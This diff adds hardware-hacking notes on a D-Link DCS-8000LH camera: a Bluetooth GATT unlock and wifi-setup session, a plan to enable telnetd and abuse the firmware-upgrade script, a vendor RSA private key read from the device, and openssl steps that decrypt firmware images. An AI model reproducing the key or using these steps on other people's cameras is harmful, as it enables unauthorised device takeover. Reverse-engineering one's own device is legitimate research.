+ 6. authenticate and unlock (input: pincode): GATT write UUID 0000a001-0000-1000-8000-00805f9b34fb <= M=0;K=jrtY6nONQ5rV+2Ph
+ 7. check current wifi settings: GATT read UUID 0000a101-0000-1000-8000-00805f9b34fb => M=0;I=;S=0;E=0
+ 8. scan for wifi networks (repeat until P=N, and then concat the results without N and P)
+    a. GATT read UUID 0000a100-0000-1000-8000-00805f9b34fb => N=3;P=1;L=I=Antiboks,M=0,C=1,S=4,E=2,P=70&L=I=ASV17,M=0,C=11,S=4,E=2,P=57&L=I=ASV17-dlink,M=0,C=6,S=4,E=2,P=71&L=I=fjorde123,M=0
+	b. GATT read UUID 0000a100-0000-1000-8000-00805f9b34fb => N=3;P=2;,C=1,S=4,E=2,P=58&L=I=Kjellerbod,M=0,C=1,S=4,E=2,P=74&L=I=mgmt,M=0,C=1,S=4,E=2,P=74&L=I=noramaja_2G,M=0,C=11,S=4,E=2,P=4
+	c. GATT read UUID 0000a100-0000-1000-8000-00805f9b34fb => N=3;P=3;6&L=I=Rindedal,M=0,C=11,S=4,E=2,P=60
+ 9. select wifi network (input: password): GATT write UUID 0000a101-0000-1000-8000-00805f9b34fb <= M=0;I=Kjellerbod;S=4;E=2;K=redeacted
+ 10. commit wifi setting: GATT write UUID 0000a102-0000-1000-8000-00805f9b34fb <= C=1
+ 11. check wifi settings again: GATT read UUID 0000a101-0000-1000-8000-00805f9b34fb => M=0;I=Kjellerbod;S=4;E=2
+ 12. check ip config: GATT read UUID 0000a104-0000-1000-8000-00805f9b34fb => I=192.168.2.37;N=255.255.255.0;G=192.168.2.1;D=148.122.16.253
+ 13. end session by locking: GATT write UUID 0000a001-0000-1000-8000-00805f9b34fb <= M=1;K=jrtY6nONQ5rV+2Ph
+ 
+
+
+```
+root@miraculix:/tmp# hcitool -i hci0 lescan
+LE Scan ...
+CC:B1:1A:1A:C6:A1 (unknown)
+B0:C5:54:4C:CC:73 (unknown)
+B0:C5:54:4C:CC:73 DCS-8000LH-CC73
+16:E6:00:43:3E:EA (unknown)
+^C
+root@miraculix:/tmp# gatttool -b B0:C5:54:4C:CC:73 -I
+[B0:C5:54:4C:CC:73][LE]> connect
+Attempting to connect to B0:C5:54:4C:CC:73
+Connection successful
+[B0:C5:54:4C:CC:73][LE]> primary 
+attr handle: 0x0001, end grp handle: 0x0008 uuid: 00001800-0000-1000-8000-00805f9b34fb
+attr handle: 0x0010, end grp handle: 0x0010 uuid: 00001801-0000-1000-8000-00805f9b34fb
+attr handle: 0x0011, end grp handle: 0x002e uuid: 0000d001-0000-1000-8000-00805f9b34fb
+[B0:C5:54:4C:CC:73][LE]> characteristics 0x0011
+handle: 0x0012, char properties: 0x12, char value handle: 0x0013, uuid: 0000a000-0000-1000-8000-00805f9b34fb
+handle: 0x0015, char properties: 0x0a, char value handle: 0x0016, uuid: 0000a001-0000-1000-8000-00805f9b34fb
+handle: 0x0017, char properties: 0x02, char value handle: 0x0018, uuid: 0000a100-0000-1000-8000-00805f9b34fb
+handle: 0x0019, char properties: 0x0a, char value handle: 0x001a, uuid: 0000a101-0000-1000-8000-00805f9b34fb
+handle: 0x001b, char properties: 0x08, char value handle: 0x001c, uuid: 0000a102-0000-1000-8000-00805f9b34fb
+handle: 0x001d, char properties: 0x02, char value handle: 0x001e, uuid: 0000a103-0000-1000-8000-00805f9b34fb
+handle: 0x001f, char properties: 0x02, char value handle: 0x0020, uuid: 0000a104-0000-1000-8000-00805f9b34fb
+handle: 0x0021, char properties: 0x0a, char value handle: 0x0022, uuid: 0000a200-0000-1000-8000-00805f9b34fb
+handle: 0x0023, char properties: 0x08, char value handle: 0x0024, uuid: 0000a201-0000-1000-8000-00805f9b34fb
+handle: 0x0025, char properties: 0x0a, char value handle: 0x0026, uuid: 0000a300-0000-1000-8000-00805f9b34fb
+handle: 0x0027, char properties: 0x02, char value handle: 0x0028, uuid: 0000a301-0000-1000-8000-00805f9b34fb
+handle: 0x0029, char properties: 0x08, char value handle: 0x002a, uuid: 0000a302-0000-1000-8000-00805f9b34fb
+handle: 0x002b, char properties: 0x08, char value handle: 0x002c, uuid: 0000a303-0000-1000-8000-00805f9b34fb
+handle: 0x002d, char properties: 0x02, char value handle: 0x002e, uuid: 0000a304-0000-1000-8000-00805f9b34fb
+[B0:C5:54:4C:CC:73][LE]> char-read-hnd 0x0016
+Characteristic value/descriptor: 4d 3d 31 3b 43 3d 62 32 67 61 65 73 63 72 62 6c 64 63 68 6e 69 6b
+[B0:C5:54:4C:CC:73][LE]> char-write-req 0x0016 4d3d303b4b3d6a727459366e4f4e513572562b325068
+Characteristic value was written successfully
+[B0:C5:54:4C:CC:73][LE]> char-read-hnd 0x001a
+Characteristic value/descriptor: 4d 3d 30 3b 49 3d 3b 53 3d 30 3b 45 3d 30 
+[B0:C5:54:4C:CC:73][LE]> char-read-hnd 0x0018
+Characteristic value/descriptor: 4e 3d 33 3b 50 3d 31 3b 4c 3d 49 3d 41 6e 74 69 62 6f 6b 73 2c 4d 3d 30 2c 43 3d 31 2c 53 3d 34 2c 45 3d 32 2c 50 3d 37 30 26 4c 3d 49 3d 41 53 56 31 37 2c 4d 3d 30 2c 43 3d 31 31 2c 53 3d 34 2c 45 3d 32 2c 50 3d 35 37 26 4c 3d 49 3d 41 53 56 31 37 2d 64 6c 69 6e 6b 2c 4d 3d 30 2c 43 3d 36 2c 53 3d 34 2c 45 3d 32 2c 50 3d 37 31 26 4c 3d 49 3d 66 6a 6f 72 64 65 31 32 33 2c 4d 3d 30 
+[B0:C5:54:4C:CC:73][LE]> char-read-hnd 0x0018
+Characteristic value/descriptor: 4e 3d 33 3b 50 3d 32 3b 2c 43 3d 31 2c 53 3d 34 2c 45 3d 32 2c 50 3d 35 38 26 4c 3d 49 3d 4b 6a 65 6c 6c 65 72 62 6f 64 2c 4d 3d 30 2c 43 3d 31 2c 53 3d 34 2c 45 3d 32 2c 50 3d 37 34 26 4c 3d 49 3d 6d 67 6d 74 2c 4d 3d 30 2c 43 3d 31 2c 53 3d 34 2c 45 3d 32 2c 50 3d 37 34 26 4c 3d 49 3d 6e 6f 72 61 6d 61 6a 61 5f 32 47 2c 4d 3d 30 2c 43 3d 31 31 2c 53 3d 34 2c 45 3d 32 2c 50 3d 34 
+[B0:C5:54:4C:CC:73][LE]> char-read-hnd 0x0018
+Characteristic value/descriptor: 4e 3d 33 3b 50 3d 33 3b 36 26 4c 3d 49 3d 52 69 6e 64 65 64 61 6c 2c 4d 3d 30 2c 43 3d 31 31 2c 53 3d 34 2c 45 3d 32 2c 50 3d 36 30 
+[B0:C5:54:4C:CC:73][LE]> char-write-req 0x001a 4d3d303b493d4b6a656c6c6572626f643b533d343b453d323b4b3d7265646163746564
+Characteristic value was written successfully
+[B0:C5:54:4C:CC:73][LE]> char-write-req 0x001c 433d31
+Characteristic value was written successfully
+[B0:C5:54:4C:CC:73][LE]> char-read-hnd 0x001a
+Characteristic value/descriptor: 4d 3d 30 3b 49 3d 4b 6a 65 6c 6c 65 72 62 6f 64 3b 53 3d 34 3b 45 3d 32 
+[B0:C5:54:4C:CC:73][LE]> char-read-hnd 0x0020
+Characteristic value/descriptor: 49 3d 31 39 32 2e 31 36 38 2e 32 2e 33 37 3b 4e 3d 32 35 35 2e 32 35 35 2e 32 35 35 2e 30 3b 47 3d 31 39 32 2e 31 36 38 2e 32 2e 31 3b 44 3d 31 34 38 2e 31 32 32 2e 31 36 2e 32 35 33 
+[B0:C5:54:4C:CC:73][LE]> char-write-req 0x0016 4d3d313b4b3d6a727459366e4f4e513572562b325068
+Characteristic value was written successfully
+[B0:C5:54:4C:CC:73][LE]> disconnect 
+```
+
+
+
+
+
+## Ultimate automated control
+
+
+Loose plan:
+
+ 1. configure networking
+ 2. enable telnetd
+ 3. optional backup
+ 4. replace /opt with our prebaked version, having mostly /opt/opt.local and /opt/version (reported as mydlink version by both bluetooth and mdns - can be useful)
+
+
+
+Note that var/www/config/firmwareupgrade.cgi is a shell script.... We might abuse that.
+
+Useful info indeed:
+
+verifyFirmware() {
+	result=uploadSign
+	#tar tf "$UPLOADBIN" > /dev/null 2> /dev/null || return 1
+	fw_sign_verify.sh "$UPLOADBIN" /etc/db/verify.key > /dev/null 2> /dev/null || return 1
+	return 0
+}
+
+decryptFirmware() {
+	result=uploadDecrypt
+	pibinfo PriKey > $dir/decrypt.key 2> /dev/null
+	fw_decrypt.sh $dir/decrypt.key $out > /dev/null 2> /dev/null || return 1
+	return 0
+}
+
+
+Also note:
+
+fw-2.02.02/root/tmp/download/version_info:{"code": 0, "fw_ver_type": "REGULAR", "process_time": 210, "main_board": {"url": "https://mydlinkmpfw.auto.mydlink.com/DCS-8000LH/DCS-8000LH_Ax_v2.02.02_3014.bin", "fw_version": "2.02.02", "md5": "97c46e5b998df42c3363866e895aa11b"}, "release_version": "3.1.0-b03", "device_id": "B0C5544CCC73"}
+
+
+Wow! The decryptkey is loaded into the pib!
+
+# pibinfo PriKey 
+-----BEGIN RSA PRIVATE KEY-----
+MIICXQIBAAKBgQC87QYtji6c0odxDs5SON+lpP0WE52WMK4OuRo8mHL0HWi0bZe0
+dyDcJ6IO6EwKuIn0sJi5oY8/P0g3PAp4TTlZm6WBiwZ8XaPwnGY8Kd2lrcRvPR+0
+UJ07hQ4RvhfFmanN8KEhe/myKkMldO/reyW8nwRRJwc2OHEvZ81KfAppWwIDAQAB
+AoGAKGeIqrV9woxD6yn/dhYzvnlKpy4KxdQjZYKw2cTA0PR5MB1AFJhlrq/LOOT1
+XlWZK3uZLhofSKeAClAM7S2W1fTbxmM8y/3g6c5Z3LbpNsvwVTWNp5ErbKMMeR+q
+CnUA+NQ47f65EwUUyTIWhMcgINLjZT33Eg0DOPUVIoiDEgECQQDta5ehRLQQN8Tr
+5OROwFrJA3qL4g+qmcnUrVfgDE/ro1zxcYluleg8ZCAJbhBgju7Y75voRlrZITkF
+2dGFZq4PAkEAy7Xowx+az4ZU6Iw/AGmbv801digR9345UKZZNRLffLh0Hda2mPM+
+25whWWTMiPcY0ty9/MZovZvVyuYuxzHb9QJBAJlbEgpdMmH3Y/9rTf2ASiPlV1bb
+onrz82aowUY7LbRrRTG/wKHpuqSnl/n/WhzEtorx2qbiKvRtfUPGOowMkwkCQGgi
+n9BPcbYwd2tBdlthoUrVPkUeisC399iwkN2+vhxltoYiYsmhXzqof6vRCXXiyv/P
+9Bcp3hU/enT0YmlVpZkCQQDmsui42t0uup3hj6ITZa2JRkCCUI7qyU0HrE65lj88
+s4IoUXr0RWUtnEbeDUbw2GtQVHNoldXVXSh30SDb6El7
+-----END RSA PRIVATE KEY-----
+
+
+Helpful hint here https://stackoverflow.com/questions/34304570/how-to-resolve-the-evp-decryptfinal-ex-bad-decrypt-during-file-decryption :
+
+Default digest has changed between those versions from md5 to
+sha256. One can specify the default digest on the command line as -md
+sha256 or -md md5 respectively
+
+
+
+And this works!!!
+
+
+
+openssl rsautl -decrypt -in aes.key.rsa -inkey ~/docs/hardware/dlink/dcs8000lh/PriKey.pem -out aes.key
+password=`cat aes.key`
+
+
+bjorn@miraculix:/tmp/update2$ openssl aes-128-cbc -v -md md5 -kfile aes.key -nosalt -d -in update.bin.aes -out update.bin
+bufsize=8192
+*** WARNING : deprecated key derivation used.
+Using -iter or -pbkdf2 would be better.
+bytes read   :   936464
+bytes written:   936454
+
+
+bjorn@miraculix:/tmp/update$ openssl aes-128-cbc -v -md md5 -kfile aes.key -nosalt -d -in update.bin.aes -out update.bin
+bufsize=8192
+*** WARNING : deprecated key derivation used.
+Using -iter or -pbkdf2 would be better.
+bytes read   :   936416
+bytes written:   936413
+
+
+
+Note that update.bin also is a shell script! 
+
+
+
+bjorn@miraculix:/tmp/update$ sh update.bin info
+MECH_SIGN="QPAT"
+MECH_VERSION="1.0"
+MECH_APP="doUpdate"
+HWBOARD="r8000lh"
+HWVERSION="1.0.0"
+MODEL="DCS-8000LH"
+PRODUCT="Internet Camera"
+OEM="D-Link"
+VENDOR="Alphanetworks"
+VERSION="1.0.0-1515"
+DESCRIPT="A full update image."
+PACKAGE=""
+bjorn@miraculix:/tmp/update$ sh update.bin brief
+
+This is a full update image.
+It will update following, ...
+        1. boot script.
+        2. kernel.
+        3. root system.
+And after it is updated, the system will reboot in 1 second.
+
+
+
+
+This is extremely useful:
+
+```
+change_root() {
+	mkdir -p /tmp/root
+	mount --bind /tmp/root /tmp/root
+	cd /tmp/root/
+	mkdir -p bin sbin usr/bin lib sys proc mnt var dev media tmp
+	cd /bin
+	cp -arf busybox ash ln vi sh mount umount sync grep openssl tar cp mv ls cat sleep mkdir rmdir rm kill chmod ps /tmp/root/bin/ 
+	cp -af /sbin/pivot_root  /tmp/root/sbin/
+	cp -af /sbin/reboot  /tmp/root/sbin/
+	cp -af /usr/bin/flash_erase /tmp/root/usr/bin/
+	cp -af /usr/bin/free /tmp/root/usr/bin/
+	cp -af /usr/bin/cut /tmp/root/usr/bin/
+	cp -af /usr/bin/expr /tmp/root/usr/bin/
+	cd /lib
+	cp -arf libssl.so* libcrypt* ld-uClibc* libgcc* libuClibc-0.9.33.so libpthread* libc.* libm-* libm.* libmtd.so libdl* /tmp/root/lib/
+
+	/bin/mount -o noatimve,move /proc /tmp/root/proc
+	/sbin/pivot_root /var/tmp/root /var/tmp/root/mnt
+	cp -arf /mnt/dev/* /dev/
+	ln -sf /bin/busybox /usr/bin/[
+	ln -sf /bin/busybox /usr/bin/[[
+	ln -sf /bin/busybox /usr/bin/]
+	mkdir -p /etc/openssl/
+	cp -f /mnt/etc/openssl/openssl.cnf /etc/openssl/
+	mount --bind /mnt/tmp /tmp
+	/bin/umount -l /mnt
+	echo 3 > /proc/sys/vm/drop_caches
+	/bin/sync
+	cd /
+	busybox killall dbd
+	busybox killall lighttpd
+	busybox killall watchDog
+	#exec /bin/busybox sh
+}
+```
+
+
+
+
+Note that update.bin is almost identical in the two sample archives - the ddPack binary is exactly the same:
+
+
+```
+bjorn@miraculix:/tmp$ diff -u update{,2}/update.bin|less
+--- update/update.bin   2019-05-10 15:02:35.722407365 +0200
++++ update2/update.bin  2019-05-10 15:02:18.802296356 +0200
+@@ -5,7 +5,7 @@
+ OEM="D-Link"
+ MODEL="DCS-8000LH"
+ PRODUCT="Internet Camera"
+-VERSION="1.0.0-1515"
++VERSION="1.0.0-3014"
+ PACKAGE=""
+ WIRELESS_MODULE="RTL8723BU"
+ # the DESCRIPT must be xml encoded.
+@@ -24,7 +24,7 @@
+ "
+ }
+ 
+-MD5SUM="f91196794237bd39bd7040919d65cbdf"
++MD5SUM="ca8aab5cda35beaab74ce9fdad65f909"
+ 
+ MECH_SIGN="QPAT"
+ MECH_VERSION="1.0"
+@@ -52,7 +52,7 @@
+ }
+ 
+ extract_ddpack() {
+-       head -n 15453 $1 | tail -n +165 | uudecode -o /tmp/ddPack
++       head -n 15454 $1 | tail -n +166 | uudecode -o /tmp/ddPack
+ }
+ 
+ dumpPibSettings() {
+@@ -124,6 +124,7 @@
+        cp -arf libssl.so* libcrypt* ld-uClibc* libgcc* libuClibc-0.9.33.so libpthread* libc.* libm-* libm.* libmtd.so libdl* /tmp/root/lib/
+ 
+        /bin/mount -o noatimve,move /proc /tmp/root/proc
++       /bin/mount -t sysfs sysfs /tmp/root/sys
+        /sbin/pivot_root /var/tmp/root /var/tmp/root/mnt
+        cp -arf /mnt/dev/* /dev/
+        ln -sf /bin/busybox /usr/bin/[
+```
+
+
+
+
+```
+bjorn@miraculix:/tmp/update$ hexdump -C update |head -16
+00000000  53 b6 3b 76 d5 56 dc a3  fb 82 ff 82 31 1c 8e f4  |S.;v.V......1...|
+00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
+00000020  75 70 64 61 74 65 2d 67  65 6e 65 72 69 63 5f 31  |update-generic_1|
+00000030  2e 30 2e 30 5f 33 36 32  35 2e 62 69 6e 00 00 00  |.0.0_3625.bin...|
+00000040  03 00 00 00 ff 00 00 00  00 00 06 00 00 60 02 00  |.............`..|
+00000050  00 00 00 00 f2 10 f1 bf  ff 00 00 00 00 00 1e 00  |................|
+00000060  9e 5b 19 00 00 00 00 00  bb 1e e8 0a ff 00 00 00  |.[..............|
+00000070  00 00 4e 00 00 50 80 00  00 00 00 00 12 6c ad 99  |..N..P.......l..|
+00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
+*
+00000400  68 73 71 73 0d 00 00 00  07 42 0b 5a 00 00 02 00  |hsqs.....B.Z....|
+00000410  02 00 00 00 04 00 11 00  e0 00 01 00 04 00 00 00  |................|
+00000420  91 01 00 00 00 00 00 00  a0 5c 02 00 00 00 00 00  |.........\......|
+00000430  98 5c 02 00 00 00 00 00  ff ff ff ff ff ff ff ff  |.\..............|
+00000440  48 5a 02 00 00 00 00 00  3a 5b 02 00 00 00 00 00  |HZ......:[......|
+00000450  24 5c 02 00 00 00 00 00  8a 5c 02 00 00 00 00 00  |$\.......\......|
+
+bjorn@miraculix:/tmp/update$ binwalk update
+
+DECIMAL       HEXADECIMAL     DESCRIPTION
+--------------------------------------------------------------------------------
+1024          0x400           Squashfs filesystem, little endian, version 4.0, compression:xz, size: 154784 bytes, 13 inodes, blocksize: 131072 bytes, created: 2017-11-14 19:20:39
+156672        0x26400         uImage header, header size: 64 bytes, header CRC: 0x63BA4812, created: 2017-11-14 18:53:33, image size: 1661790 bytes, Data Address: 0x804D4960, Entry Point: 0x804D4960, data CRC: 0xAF348ADF, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: none, image name: "linux_3.10"
+1818526       0x1BBF9E        Squashfs filesystem, little endian, version 4.0, compression:xz, size: 8408112 bytes, 2142 inodes, blocksize: 131072 bytes, created: 2017-11-14 19:21:12
+```
+
+
+
+```
+bjorn@miraculix:/tmp/update2$  hexdump -C update |head -16
+00000000  84 dd 19 a9 dc 69 0b 10  1b 6d 72 09 43 04 f7 f4  |.....i...mr.C...|
+00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
+00000020  75 70 64 61 74 65 2d 67  65 6e 65 72 69 63 5f 31  |update-generic_1|
+00000030  2e 30 2e 30 5f 33 36 32  35 2e 62 69 6e 00 00 00  |.0.0_3625.bin...|
+00000040  03 00 00 00 ff 00 00 00  00 00 06 00 00 30 05 00  |.............0..|
+00000050  00 00 00 00 8e 91 0e 7e  ff 00 00 00 00 00 1e 00  |.......~........|
+00000060  c3 5a 19 00 00 00 00 00  0e 5b d0 18 ff 00 00 00  |.Z.......[......|
+00000070  00 00 4e 00 00 20 7e 00  00 00 00 00 f4 2f 3c fb  |..N.. ~....../<.|
+00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
+*
+00000400  68 73 71 73 10 00 00 00  c4 3b 65 5c 00 00 02 00  |hsqs.....;e\....|
+00000410  02 00 00 00 04 00 11 00  e0 00 01 00 04 00 00 00  |................|
+00000420  05 02 00 00 00 00 00 00  43 2b 05 00 00 00 00 00  |........C+......|
+00000430  3b 2b 05 00 00 00 00 00  ff ff ff ff ff ff ff ff  |;+..............|
+00000440  78 28 05 00 00 00 00 00  96 29 05 00 00 00 00 00  |x(.......)......|
+00000450  b7 2a 05 00 00 00 00 00  2d 2b 05 00 00 00 00 00  |.*......-+......|
+
+bjorn@miraculix:/tmp/update2$ binwalk update
+
+DECIMAL       HEXADECIMAL     DESCRIPTION
+--------------------------------------------------------------------------------
+1024          0x400           Squashfs filesystem, little endian, version 4.0, compression:xz, size: 338755 bytes, 16 inodes, blocksize: 131072 bytes, created: 2019-02-14 09:58:28
+340992        0x53400         uImage header, header size: 64 bytes, header CRC: 0x675F081D, created: 2019-02-14 09:31:53, image size: 1661571 bytes, Data Address: 0x804D4960, Entry Point: 0x804D4960, data CRC: 0x73083021, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: none, image name: "linux_3.10"
+2002627       0x1E8EC3        Squashfs filesystem, little endian, version 4.0, compression:xz, size: 8265620 bytes, 2145 inodes, blocksize: 131072 bytes, created: 2019-02-14 09:58:45
+
+bjorn@miraculix:/tmp/update2$ cmp _update.extracted/400.squashfs ~/docs/hardware/dlink/dcs8000lh/fw-2.02.02/mtd/mtd2 
+_update.extracted/400.squashfs /home/bjorn/docs/hardware/dlink/dcs8000lh/fw-2.02.02/mtd/mtd2 differ: byte 339969, line 1341
+
+
+
+bjorn@miraculix:/tmp/update2$ hexdump -C ~/docs/hardware/dlink/dcs8000lh/fw-2.02.02/mtd/mtd2 |tail -20
+00052a70  00 02 00 01 00 73 61 c1  01 09 00 02 00 06 00 73  |.....sa........s|
+00052a80  74 72 6d 73 76 72 e5 01  0a 00 02 00 06 00 76 65  |trmsvr........ve|
+00052a90  72 73 69 6f 6e 20 80 d4  be 04 00 00 00 00 00 a4  |rsion ..........|
+00052aa0  69 00 00 00 00 00 00 ec  47 04 00 00 00 00 00 e8  |i.......G.......|
+00052ab0  76 00 00 00 00 00 00 95  2a 05 00 00 00 00 00 6c  |v.......*......l|
+00052ac0  00 fd 37 7a 58 5a 00 00  01 69 22 de 36 03 c0 31  |..7zXZ...i".6..1|
+00052ad0  80 01 21 01 02 00 00 00  00 d5 63 7a 58 e0 00 7f  |..!.......czX...|
+00052ae0  00 29 5d 00 02 80 8c c2  fd 03 13 13 bd 99 05 db  |.)].............|
+00052af0  e5 85 88 7a 67 d4 1e 28  ef a3 03 b2 03 4e 9e c5  |...zg..(.....N..|
+00052b00  54 57 16 26 a7 2a 6b c0  71 9a 2b c4 e0 00 00 00  |TW.&.*k.q.+.....|
+00052b10  00 13 b2 2b 6f 00 01 45  80 01 00 00 00 f5 98 9a  |...+o..E........|
+00052b20  95 3e 30 0d 8b 02 00 00  00 00 01 59 5a bf 2a 05  |.>0........YZ.*.|
+00052b30  00 00 00 00 00 04 80 00  00 00 00 35 2b 05 00 00  |...........5+...|
+00052b40  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
+*
+00053000  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
+*
+00060000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
+*
+00100000
+
+
+
+bjorn@miraculix:/tmp/update2$ hexdump -C _update.extracted/400.squashfs  |egrep '^0005(2[b-f]|30)'
+00052b00  54 57 16 26 a7 2a 6b c0  71 9a 2b c4 e0 00 00 00  |TW.&.*k.q.+.....|
+00052b10  00 13 b2 2b 6f 00 01 45  80 01 00 00 00 f5 98 9a  |...+o..E........|
+00052b20  95 3e 30 0d 8b 02 00 00  00 00 01 59 5a bf 2a 05  |.>0........YZ.*.|
+00052b30  00 00 00 00 00 04 80 00  00 00 00 35 2b 05 00 00  |...........5+...|
+00052b40  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
+00053000  27 05 19 56 67 5f 08 1d  5c 65 35 89 00 19 5a 83  |'..Vg_..\e5...Z.|
+00053010  80 4d 49 60 80 4d 49 60  73 08 30 21 05 05 02 00  |.MI`.MI`s.0!....|
+00053020  6c 69 6e 75 78 5f 33 2e  31 30 00 00 00 00 00 00  |linux_3.10......|
+00053030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
+00053040  21 80 80 00 21 88 a0 00  21 90 c0 00 21 98 e0 00  |!...!...!...!...|
+00053050  67 80 04 3c f0 a3 84 24  a7 80 06 3c 00 c4 c6 24  |g..<...$...<...$|
+00053060  00 00 80 ac fe ff c4 14  04 00 84 24 67 80 04 3c  |...........$g..<|
+00053070  00 a4 84 24 a7 80 1d 3c  00 c4 bd 27 4d 80 1f 3c  |...$...<...'M..<|
+00053080  b4 49 ff 27 4d 80 1a 3c  4c 4c 5a 27 08 00 40 03  |.I.'M..<LLZ'..@.|
+00053090  00 00 00 00 21 20 00 02  21 28 20 02 21 30 40 02  |....! ..!( .!0@.|
+000530a0  21 38 60 02 3c 80 1a 3c  e0 98 5a 37 08 00 40 03  |!8`.<..<..Z7..@.|
+000530b0  00 00 00 00 ff ff 00 10  00 00 00 00 00 00 00 00  |................|
+000530c0  03 00 81 04 67 80 18 3c  08 00 e0 03 21 10 00 00  |....g..<....!...|
+000530d0  fc a3 02 8f 05 00 40 14  fc ff 03 24 67 80 02 3c  |......@....$g..<|
+000530e0  f4 a3 42 8c fc a3 02 af  fc a3 02 8f 03 00 42 24  |..B...........B$|
+000530f0  24 10 43 00 21 20 82 00  fc a3 04 af 67 80 18 3c  |$.C.! ......g..<|
+
+
+bjorn@miraculix:/tmp/update2$ hexdump -C ~/docs/hardware/dlink/dcs8000lh/fw-2.02.02/mtd/mtd2 |egrep '^0005(2[b-f]|300)'
+00052b00  54 57 16 26 a7 2a 6b c0  71 9a 2b c4 e0 00 00 00  |TW.&.*k.q.+.....|
+00052b10  00 13 b2 2b 6f 00 01 45  80 01 00 00 00 f5 98 9a  |...+o..E........|
+00052b20  95 3e 30 0d 8b 02 00 00  00 00 01 59 5a bf 2a 05  |.>0........YZ.*.|
+00052b30  00 00 00 00 00 04 80 00  00 00 00 35 2b 05 00 00  |...........5+...|
+00052b40  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
+00053000  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
+
+
+bjorn@miraculix:/tmp/update2$ hexdump -C _update.extracted/400.squashfs  |tail -20
+000ffed0  31 a7 7c a3 ec 78 cf 09  b4 e3 e3 72 c4 00 99 70  |1.|..x.....r...p|
+000ffee0  92 a3 5b 89 1a 7a ad 0e  b8 0b 37 5f b1 a6 d9 3b  |..[..z....7_...;|
+000ffef0  46 ad ad 8f 16 21 94 c3  a9 39 94 f6 c6 2a 42 8e  |F....!...9...*B.|
+000fff00  c5 56 27 af a4 b9 3f 8b  52 1d 05 a3 7e 3f d3 c1  |.V'...?.R...~?..|
+000fff10  9b e0 e5 5c a3 cd b6 e8  9a 5f 8c 3c b6 8b 0f e7  |...\....._.<....|
+000fff20  17 2f e9 ed ce 9e b8 97  6d 7c a0 44 6f 42 a0 d0  |./......m|.DoB..|
+000fff30  29 de 24 34 46 1c a6 98  a1 92 39 68 cf 99 e9 4f  |).$4F.....9h...O|
+000fff40  e7 b3 df 76 40 5a e4 80  ac 38 bc 80 fb b6 f9 4e  |...v@Z...8.....N|
+000fff50  87 fb da 3c 47 a7 65 ff  f4 94 f2 71 3f a0 59 80  |...<G.e....q?.Y.|
+000fff60  86 22 db bb a6 15 13 51  07 8d b0 50 70 b7 85 a9  |.".....Q...Pp...|
+000fff70  08 97 54 ee 93 3f 96 b3  22 b3 7b 1d 74 cb b1 00  |..T..?..".{.t...|
+000fff80  c6 d1 4f 25 d7 cd 86 8f  7d a2 6a c7 12 2f 6d 65  |..O%....}.j../me|
+000fff90  6e 14 ae 2f 75 02 9c be  25 e5 82 e8 24 70 4c 45  |n../u...%...$pLE|
+000fffa0  4c 39 24 a4 f9 0c 5f 48  21 9d de 71 8d 30 cd 6e  |L9$..._H!..q.0.n|
+000fffb0  50 75 8f 28 14 1f 00 e3  5a d4 24 e5 50 4d 21 c1  |Pu.(....Z.$.PM!.|
+000fffc0  f1 fd b9 ed e8 c4 42 5e  b4 6a 2f 96 12 86 21 78  |......B^.j/...!x|
+000fffd0  b7 12 11 1c 51 cb a9 21  33 0b 7c 96 4e 0b 6e c4  |....Q..!3.|.N.n.|
+000fffe0  61 cc d2 0a 61 30 67 2c  d3 d4 0f ee 7b 3a 8e 80  |a...a0g,....{:..|
+000ffff0  dd af 1b d1 1d 29 db 84  82 45 f5 32 8d 44 6a 4c  |.....)...E.2.DjL|
+00100000
+
+```
+
+
+Note that there are lots of compressed 00 byte lines between 00052b40
+and 00053000 above.  And 0x53000 is 339968.
+
+
+
+While the rootfs seems to be just big enough, and there has no extra data:
+
+```
+bjorn@miraculix:/tmp/update2$ hexdump -C _update.extracted/1E8EC3.squashfs|tail -20
+007e1e80  bd 80 eb 69 d2 14 8c 15  2b b7 02 f7 9e dc f4 f6  |...i....+.......|
+007e1e90  5d fb b1 a5 64 4b 98 0a  40 68 c8 70 13 c7 52 55  |]...dK..@h.p..RU|
+007e1ea0  59 42 7e 72 f8 ab d8 c1  4e 7c 8b ea d5 65 aa 47  |YB~r....N|...e.G|
+007e1eb0  59 a4 b9 40 43 c1 6a f7  58 b3 cd bb 4e c1 68 26  |Y..@C.j.X...N.h&|
+007e1ec0  37 22 35 a0 05 19 42 3c  48 c0 08 95 89 19 51 9d  |7"5...B<H.....Q.|
+007e1ed0  e6 d8 87 4c c5 39 ef e7  6e ad fb 24 ca b1 1b 5f  |...L.9..n..$..._|
+007e1ee0  b3 c9 e4 c3 c3 d3 b0 a3  43 48 e6 26 e1 80 ad f9  |........CH.&....|
+007e1ef0  95 38 36 dd 1a b4 ab 59  03 ee e3 1e 9b f5 64 43  |.86....Y......dC|
+007e1f00  ce 44 1c 20 6e e7 77 23  ed 20 9c 90 4b 00 d5 01  |.D. n.w#. ..K...|
+007e1f10  1e 1c dd c4 7b 96 f2 1d  47 ae 2e e0 5c 51 6c 54  |....{...G...\QlT|
+007e1f20  9b e7 92 66 5e 33 98 00  e0 79 b9 3c f8 01 38 d5  |...f^3...y.<..8.|
+007e1f30  82 1b 11 48 66 be 0a 7c  b7 19 c3 7c 0d be 91 27  |...Hf..|...|...'|
+007e1f40  95 32 0b 13 78 6a 49 dd  f6 f4 a1 3f e3 00 a1 63  |.2..xjI....?...c|
+007e1f50  86 16 00 01 84 02 88 06  00 00 15 33 d4 10 3e 30  |...........3..>0|
+007e1f60  0d 8b 02 00 00 00 00 01  59 5a 08 0d 7e 00 00 00  |........YZ..~...|
+007e1f70  00 00 d2 15 7e 00 00 00  00 00 40 1e 7e 00 00 00  |....~.....@.~...|
